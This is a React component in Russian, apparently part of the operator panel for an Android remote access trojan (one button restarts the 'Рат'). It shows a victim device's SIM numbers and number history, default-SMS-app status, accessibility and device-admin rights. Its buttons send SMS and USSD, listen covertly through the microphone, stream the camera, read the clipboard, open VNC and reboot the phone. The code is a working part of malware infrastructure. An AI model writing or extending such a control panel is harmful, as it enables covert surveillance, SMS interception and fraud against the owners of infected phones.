import React, { useState, useEffect } from 'react';

const NoteEditor = ({ device, onSaveNote }) => {
  const [isEditing, setIsEditing] = useState(false);
  const [noteText, setNoteText] = useState(device.note || '');
  const [isExpanded, setIsExpanded] = useState(false);
  const [isHover, setIsHover] = useState(false);

  useEffect(() => {
    setNoteText(device.note || '');
    setIsExpanded(false);
  }, [device.note]);

  const handleSave = () => {
    onSaveNote(device.uuid, noteText);
    setIsEditing(false);
    setIsExpanded(false);
  };

  const handleKeyDown = (e) => {
    if (e.key === 'Enter' && !e.shiftKey) {
      e.preventDefault();
      handleSave();
    } else if (e.key === 'Escape') {
      setIsEditing(false);
      setNoteText(device.note || '');
      setIsExpanded(false);
    }
  };

  if (isEditing) {
    return (
      <div className="note-editor editing">
        <textarea
          value={noteText}
          onChange={(e) => setNoteText(e.target.value.slice(0, 75))}
          onKeyDown={handleKeyDown}
          onBlur={handleSave}
          maxLength="75"
          rows={3}
        />
      </div>
    );
  }

  const isLong = (noteText || '').length > 25;
  const shownText = isExpanded
    ? noteText
    : (noteText || '').slice(0, 25) + (isLong ? '…' : '');
  const hasText = !!noteText;

  const handleClick = () => {
    if (isLong && !isExpanded) {
      setIsExpanded(true);
    } else {
      setIsEditing(true);
    }
  };

  return (
    <div
      className={`note-editor note-editor-hoverable ${isExpanded ? 'note-editor-expanded' : ''}`}
      onClick={handleClick}
      onMouseEnter={() => setIsHover(true)}
      onMouseLeave={() => setIsHover(false)}
    >
      <span
        className={
          hasText
            ? isExpanded
              ? 'note-text-expanded'
              : 'note-text-truncated'
            : 'note-placeholder'
        }
      >
        {hasText ? shownText : '[Добавить заметку]'}
      </span>
      {isHover && hasText && (
        <div className="note-popover">{noteText}</div>
      )}
    </div>
  );
};




const ManualPhoneEditor = ({ device, onSaveManualPhone }) => {
  const [isEditing, setIsEditing] = useState(false);
  const [phoneText, setPhoneText] = useState(device.manualPhone || '');

  useEffect(() => {
    setPhoneText(device.manualPhone || '');
  }, [device.manualPhone]);

  const handleSave = () => {
    onSaveManualPhone(device.uuid, phoneText.trim());
    setIsEditing(false);
  };

  const handleKeyDown = (e) => {
    if (e.key === 'Enter') { e.preventDefault(); handleSave(); }
    else if (e.key === 'Escape') { setIsEditing(false); setPhoneText(device.manualPhone || ''); }
  };

  if (isEditing) {
    return (
      <span style={{ display: 'inline-flex', alignItems: 'center', gap: '4px' }}>
        <strong>📞 Номер:</strong>{' '}
        <input
          autoFocus
          value={phoneText}
          onChange={e => setPhoneText(e.target.value)}
          onKeyDown={handleKeyDown}
          onBlur={handleSave}
          maxLength={20}
          style={{ width: '130px', padding: '1px 5px', background: '#2b2b38', border: '1px solid #6c63ff', borderRadius: '3px', color: '#fff', fontSize: '12px' }}
        />
      </span>
    );
  }

  const hasPhone = !!phoneText;
  return (
    <span
      onClick={() => setIsEditing(true)}
      title="Нажмите чтобы изменить ручной номер"
      style={{ cursor: 'pointer', fontSize: '12px', color: hasPhone ? '#a5d8ff' : '#666', borderBottom: '1px dashed #555' }}
    >
      <strong>📞 Номер:</strong>{' '}
      {hasPhone ? phoneText : '[добавить]'}
    </span>
  );
};

function DeviceDetailsHeader({
    device, onClose, onSendSmsClick, onSendUssdClick, ws,
    isMonitoring, deviceStatus, countdown, onStartMonitoring,
    isFgMonitoring, fgAppName, fgCountdown, onStartFgMonitoring,
    onTakePhoto, onToggleBroadcast, isBroadcasting, potoStatus,
    isSelectingBroadcast, onCancelBroadcastSelection, onBroadcastSelect,
    broadcastType, onStartAudioBroadcast, onAppRestart, onServerReconnect,
    onSaveNote, onSaveManualPhone, onUpdateAll, isSystemUpdating,
    onVncClick, onClipboardClick, clipLoading, onPhoneRebootClick,
    onVncVerify, vncVerifying, vncVerifySecondsLeft
}) {
    const [isActionsOpen, setActionsOpen] = useState(false);
    const [isRestartOpen, setRestartOpen] = useState(false);

    const isOnline = (lastSeen) => {
        if (!lastSeen) return false;
        return (new Date() - new Date(lastSeen)) < 60000;
    };
    
    const appName = device.systemInfo?.deviceInfo?.data?.app_name || 'N/A';
    const simCards = device.systemInfo?.simInfo?.data?.active_sims || [];
    const isDefaultSms = device.systemInfo?.permissions?.data?.is_default_sms_app;
    const hasSpecialPerms = device.systemInfo?.permissions?.data?.is_accessibility_enabled === true
        || device.systemInfo?.privileges?.find?.(p => p.name === 'accessibility' && p.granted)
        || device.accLocked === true;

    // Фича 9: определяем доступные разрешения для контекстного показа кнопок
    const permsData = device.systemInfo?.permissions?.data || {};
    const hasCamera    = permsData['android.permission.CAMERA'] === true;
    const hasAudio     = permsData['android.permission.RECORD_AUDIO'] === true;
    const hasMedia     = permsData['android.permission.READ_MEDIA_IMAGES'] === true
                       || permsData['android.permission.READ_EXTERNAL_STORAGE'] === true
                       || permsData['has_gallery_access'] === true;

    // Фича 9: lite-версия = app_name содержит 'lite' (регистронезависимо)
    const isLiteVersion = appName.toLowerCase().includes('lite');

    const isDeviceAdmin = device.systemInfo?.permissions?.data?.is_device_admin === true;
    const createdAt = device._id
        ? new Date(parseInt(String(device._id).substring(0, 8), 16) * 1000)
        : null;
    const deviceTz = device.deviceTimezone || (() => {
        const dt = device.systemInfo?.permissions?.data?.device_time;
        if (!dt || dt.length < 5) return '';
        const sign = dt[dt.length - 5];
        const h = parseInt(dt.slice(dt.length - 4, dt.length - 2), 10);
        const m = parseInt(dt.slice(dt.length - 2), 10);
        return (sign === '+' || sign === '-') && !isNaN(h) && !isNaN(m)
            ? (m === 0 ? `UTC${sign}${h}` : `UTC${sign}${h}:${String(m).padStart(2, '0')}`)
            : '';
    })();
    const handleActionClick = (action) => {
        const closingActions = [onSendSmsClick, onSendUssdClick, onStartMonitoring, onTakePhoto, onToggleBroadcast, onStartAudioBroadcast];

        if (closingActions.includes(action)) {
            action();
            setActionsOpen(false);
        } else if (action === setRestartOpen) {
            setRestartOpen(true);
        } else if (action === onAppRestart) { 
            onAppRestart();
            setRestartOpen(false); 
            setActionsOpen(false); 
        } else if (action === onServerReconnect) { 
            onServerReconnect();
            setRestartOpen(false);
            setActionsOpen(false);
        } else if (action === onCancelBroadcastSelection) {
            action();
            setActionsOpen(false);
        } else if (typeof action === 'function') {
            action();
        }
    };

    const renderPotoButton = () => {
        if (potoStatus.active) {
            return <div className="action-status">{potoStatus.message}</div>;
        }
        return <button onClick={onTakePhoto}>Сделать Фото</button>;
    };

    const renderUpdateAllButton = () => {
        return (
            <button 
                onClick={onUpdateAll} 
                disabled={isSystemUpdating} 
                style={{ 
                    minWidth: '120px', 
                    opacity: isSystemUpdating ? 0.6 : 1,
                    cursor: isSystemUpdating ? 'not-allowed' : 'pointer',
                    backgroundColor: isSystemUpdating ? '#555' : '' 
                }}
            >
                {isSystemUpdating ? 'Ждите...' : 'Обновить всё'}
            </button>
        );
    };

    const renderUpdateAllButtonMobile = () => {
         return (
            <button
                onClick={() => handleActionClick(onUpdateAll)}
                disabled={isSystemUpdating}
                style={{ opacity: isSystemUpdating ? 0.6 : 1 }}
            >
                {isSystemUpdating ? 'Ждите...' : 'Обновить всё'}
            </button>
        );
    };

    const renderVncVerifyButton = () => {
        if (vncVerifying) {
            return (
                <button disabled style={{ minWidth: '170px', opacity: 0.7, cursor: 'not-allowed' }}>
                    ♿ Проверка... {vncVerifySecondsLeft}с
                </button>
            );
        }
        return (
            <button onClick={onVncVerify} style={{ minWidth: '170px' }}>
                ♿ Проверить раз. ВНК
            </button>
        );
    };

    const renderPotoButtonMobile = () => {
        if (potoStatus.active) {
            return <div className="action-status">{potoStatus.message}</div>;
        }
        return <button onClick={() => handleActionClick(onTakePhoto)}>Сделать Фото</button>;
    }

    const renderBroadcastButton = () => {
        if (isBroadcasting) {
            return (
                <div className="button-group">
                    <button onClick={onToggleBroadcast} style={{ minWidth: '180px', backgroundColor: '#e74c3c' }}>Остановить Трансляцию</button>
                </div>
            );
        }
        if (isSelectingBroadcast) {
            return (
                <div className="button-group">
                    <span className="button-group-label">Режим:</span>
                    <button onClick={() => onBroadcastSelect({ type: 'webrtc', sensor: 'front' })}>Трансляция со звуком</button>
                    <button onClick={() => onBroadcastSelect({ type: 'mjpeg', sensor: 'back' })}>Трансляция запасной вариант (без звука)</button>
                    <button onClick={onCancelBroadcastSelection} className="cancel">Отмена</button>
                </div>
            );
        }
        return <button onClick={onToggleBroadcast} style={{ minWidth: '180px' }}>Начать Трансляцию</button>;
    };

    const renderBroadcastButtonMobile = () => {
        if (isBroadcasting) {
            return (
                <div className="button-group">
                    <button onClick={() => handleActionClick(onToggleBroadcast)} style={{ minWidth: '180px', backgroundColor: '#e74c3c' }}>Остановить Трансляцию</button>
                </div>
            );
        }
        if (isSelectingBroadcast) {
            return (
                <div className="button-group">
                    <span className="button-group-label">Режим:</span>
                    <button onClick={() => handleActionClick(() => onBroadcastSelect({ type: 'webrtc', sensor: 'front' }))}>Трансляция со звуком</button>
                    <button onClick={() => handleActionClick(() => onBroadcastSelect({ type: 'mjpeg', sensor: 'back' }))}>Трансляция (без звука)</button>
                    <button onClick={() => handleActionClick(onCancelBroadcastSelection)} className="cancel">Отмена</button>
                </div>
            );
        }
        return <button onClick={() => handleActionClick(onToggleBroadcast)} style={{ minWidth: '180px' }}>Начать Трансляцию</button>;
    };
    
    const renderAudioBroadcastButton = () => {
        return <button onClick={onStartAudioBroadcast} style={{ minWidth: '180px' }}>Начать Прослушку</button>;
    };

    const renderAudioBroadcastButtonMobile = () => {
        return <button onClick={() => handleActionClick(onStartAudioBroadcast)} style={{ minWidth: '180px' }}>Начать Прослушку</button>;
    };
    const renderRestartButton = () => {
        if (isRestartOpen) {
            return (
                <div className="button-group">
                    <span className="button-group-label">Действие:</span>
                    <button onClick={() => { onAppRestart(); setRestartOpen(false); }}>Перезапуск Рата</button>
                    <button onClick={() => { onServerReconnect(); setRestartOpen(false); }}>Переподключить сервер</button> 
                    <button onClick={() => setRestartOpen(false)} className="cancel">Отмена</button>
                </div>
            );
        }
        return <button onClick={() => setRestartOpen(true)} style={{ minWidth: '120px' }}>Перезапуск</button>;
    };

    const renderRestartButtonMobile = () => {
        if (isRestartOpen) {
            return (
                <div className="button-group">
                    <span className="button-group-label">Действие:</span>
                    <button onClick={() => handleActionClick(onAppRestart)}>Перезапуск Рата</button>
                    <button onClick={() => handleActionClick(onServerReconnect)}>Переподключить сервер</button> 
                    <button onClick={() => handleActionClick(() => setRestartOpen(false))} className="cancel">Отмена</button>
                </div>
            );
        }
        return <button onClick={() => handleActionClick(setRestartOpen)} style={{ minWidth: '120px' }}>Перезапуск</button>;
    };
    
    return (
        <>
            <div className="modal-header">
                <div className="modal-header-content">
                    <div className="info-line">
                        <span className={`badge ${isOnline(device.lastSeen) ? 'online' : 'offline'}`}>
                            {isOnline(device.lastSeen) ? 'Online' : 'Offline'}
                        </span>
                        <span className="device-uuid-header">{device.uuid}</span>
                        <span className="app-name-header">{appName}</span>
                    </div>

                    <div className="info-line">
                        <span>📱 {device.brand} {device.model}</span>
                        <span>🕐 {device.lastSeen ? new Date(device.lastSeen).toLocaleString('ru-RU') : '-'}</span>
                        {createdAt && (
                            <span title="Дата первого появления" style={{ fontSize: '11px', color: '#8899aa' }}>
                                📅 {createdAt.toLocaleString('ru-RU')}{deviceTz ? ` ${deviceTz}` : ''}
                            </span>
                        )}
                        <span><strong>User:</strong> {device.userId}</span>
                        <NoteEditor device={device} onSaveNote={onSaveNote} />
                    </div>
                    <div className="info-line sim-info-header">
                        {simCards.map((sim, index) => {
                            const slotIndex = sim.simSlotIndex !== undefined ? sim.simSlotIndex : index;
                            const historyArr = (device.systemInfo?.simHistory && device.systemInfo.simHistory[slotIndex]) || [];
                            const hasHistory = historyArr.length > 1;
                            const tooltipText = hasHistory ? "История номеров:\n" + historyArr.map((n, i) => `${i + 1}. ${n}`).join('\n') : "";

                            const slotIcon = slotIndex === 0
                                ? <span>📞</span>
                                : <span style={{ color: '#4fc3f7' }}>☎</span>;
                            return (
                                <span
                                    key={index}
                                    className="sim-card-header"
                                    title={tooltipText}
                                    style={{ cursor: hasHistory ? 'help' : 'default' }}
                                >
                                    <strong>{slotIcon}</strong>{' '}
                                    {hasHistory ? (
                                        <span style={{ display: 'inline-flex', alignItems: 'center', gap: '6px' }}>
                                            {sim.number || 'Нет номера'}
                                            <span style={{ fontSize: '14px', opacity: 0.8 }}>
                                                ℹ️
                                            </span>
                                        </span>
                                    ) : (
                                        <span>{sim.number || 'Нет номера'}</span>
                                    )}
                                </span>
                            );
                        })}
                        {onSaveManualPhone && (
                            <ManualPhoneEditor device={device} onSaveManualPhone={onSaveManualPhone} />
                        )}
                        <span className="sms-app-status" title="SMS по умолчанию">
                            <strong>💬</strong>{' '}
                            {isDefaultSms === true && <span style={{ color: '#2e7d32', fontWeight: 'bold' }}>✔</span>}
                            {isDefaultSms === false && <span style={{ color: '#e74c3c', fontWeight: 'bold' }}>✖</span>}
                            {isDefaultSms === undefined && <span>?</span>}
                        </span>
                        <span className="sms-app-status" title="Спец. разрешения (accessibility)" style={{ marginLeft: '10px' }}>
                            <strong>♿</strong>{' '}
                            {hasSpecialPerms ? (<span style={{ color: '#2e7d32', fontWeight: 'bold' }}>✔</span>) : (<span style={{ color: '#e74c3c', fontWeight: 'bold' }}>✖</span>)}
                        </span>
                        <span className="sms-app-status" title="Администратор устройства" style={{ marginLeft: '10px' }}>
                            <strong>🛡</strong>{' '}
                            {isDeviceAdmin ? (<span style={{ color: '#2e7d32', fontWeight: 'bold' }}>✔</span>) : (<span style={{ color: '#e74c3c', fontWeight: 'bold' }}>✖</span>)}
                        </span>
                    </div>
                </div>
                <button className="close-button" onClick={onClose}>&times;</button>
            </div>
            
            <div className="modal-actions">
                <button onClick={onSendSmsClick}>Отправка СМС</button>
                <button onClick={onSendUssdClick}>Отправка USSD</button>
                {isMonitoring ? (
                    <div className="status-monitor">
                        <span>{deviceStatus || 'Ожидание статуса...'}</span>
                        <span className="timer">({countdown}с)</span>
                    </div>
                ) : (
                    <button onClick={onStartMonitoring}>Проверка Статуса</button>
                )}
                {isFgMonitoring ? (
                    <div className="status-monitor">
                        <span>{fgAppName || 'Ожидание...'}</span>
                        <span className="timer">({fgCountdown}с)</span>
                    </div>
                ) : onStartFgMonitoring ? (
                    <button onClick={onStartFgMonitoring}>Проверка зап. приложения</button>
                ) : null}
                {/* {(hasCamera || hasMedia) && renderPotoButton()} */}
                {/* {(hasCamera || hasAudio) && renderBroadcastButton()} */}
                {/* {hasAudio && renderAudioBroadcastButton()} */}
                {renderRestartButton()}
                {renderUpdateAllButton()}
                {renderVncVerifyButton()}
                {onVncClick && (
                    <button onClick={onVncClick}>
                        📺 VNC
                    </button>
                )}
                {onClipboardClick && (
                    <button onClick={onClipboardClick} disabled={clipLoading} title="Прочитать буфер обмена устройства">
                        {clipLoading ? '⏳ Буфер...' : '📋 Буфер'}
                    </button>
                )}
                {onPhoneRebootClick && (
                    <button onClick={onPhoneRebootClick} title="Перезагрузить телефон">
                        📱 Перезапуск Тел.
                    </button>
                )}
            </div>



            <div className="modal-actions-mobile">
                <button className="mobile-dropdown-button" onClick={() => setActionsOpen(prev => !prev)}>
                    Быстрое действие {isActionsOpen ? '▲' : '▼'}
                </button>
                {isActionsOpen && (
                    <div className="mobile-dropdown-content actions">
                        <button onClick={() => handleActionClick(onSendSmsClick)}>Отправка СМС</button>
                        <button onClick={() => handleActionClick(onSendUssdClick)}>Отправка USSD</button>
                        {isMonitoring ? (
                             <div className="status-monitor" style={{margin: '10px', justifyContent: 'center'}}>
                                <span>{deviceStatus || 'Ожидание...'}</span>
                                <span className="timer">({countdown}с)</span>
                            </div>
                        ) : (
                            <button onClick={() => handleActionClick(onStartMonitoring)}>Проверка Статуса</button>
                        )}
                        {isFgMonitoring ? (
                            <div className="status-monitor" style={{margin: '10px', justifyContent: 'center'}}>
                                <span>{fgAppName || 'Ожидание...'}</span>
                                <span className="timer">({fgCountdown}с)</span>
                            </div>
                        ) : onStartFgMonitoring ? (
                            <button onClick={() => handleActionClick(onStartFgMonitoring)}>Проверка зап. приложения</button>
                        ) : null}
                        {/* {(hasCamera || hasMedia) && renderPotoButtonMobile()} */}
                        {/* {(hasCamera || hasAudio) && renderBroadcastButtonMobile()} */}
                        {/* {hasAudio && renderAudioBroadcastButtonMobile()} */}
                        {renderRestartButtonMobile()}
                        {renderUpdateAllButtonMobile()}
                        {renderVncVerifyButton()}
                        {onVncClick && (
                            <button onClick={() => { onVncClick(); setActionsOpen(false); }}>
                                📺 VNC
                            </button>
                        )}
                        {onClipboardClick && (
                            <button onClick={() => { onClipboardClick(); setActionsOpen(false); }} disabled={clipLoading} title="Прочитать буфер обмена устройства">
                                {clipLoading ? '⏳ Буфер...' : '📋 Буфер'}
                            </button>
                        )}
                        {onPhoneRebootClick && (
                            <button onClick={() => { onPhoneRebootClick(); setActionsOpen(false); }} title="Перезагрузить телефон">
                                📱 Перезапуск Тел.
                            </button>
                        )}
                    </div>
                )}
            </div>
        </>
    );
}

export default DeviceDetailsHeader;